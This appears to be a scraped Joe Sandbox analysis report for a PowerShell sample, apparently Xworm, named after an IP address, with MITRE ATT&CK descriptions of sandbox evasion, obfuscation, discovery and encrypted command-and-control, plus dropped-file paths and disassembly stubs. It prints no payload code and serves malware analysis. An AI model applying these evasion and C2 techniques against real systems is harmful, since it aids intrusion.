Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 92.255.57.155.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegSvcs.exe_6ffd24152b5e9a3a3eb1fb64c4ad5c89541278d_74bcc9ed_e7b8dc66-00cb-4169-9a41-bd6311868630\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD6CE.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD894.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD8B4.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_loop3fyr.xmn.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nnwuctoj.gsi.ps1

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QSACXR4DH9JRFG2F74VT.temp

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Windows Analysis Report
92.255.57.155.ps1

Function 04D43410 Relevance: 6.7, Strings: 5, Instructions: 442
COMMON

Function 04D47948 Relevance: 3.0, Strings: 2, Instructions: 536
COMMON

Function 04D44C10 Relevance: 3.2, Strings: 2, Instructions: 696
COMMON

Function 04D42428 Relevance: 2.8, Strings: 2, Instructions: 329
COMMON

Function 04D428D8 Relevance: 2.7, Strings: 2, Instructions: 225
COMMON

Function 04D440D0 Relevance: 1.7, Strings: 1, Instructions: 458
COMMON

Function 04D402AD Relevance: 1.6, Strings: 1, Instructions: 344
COMMON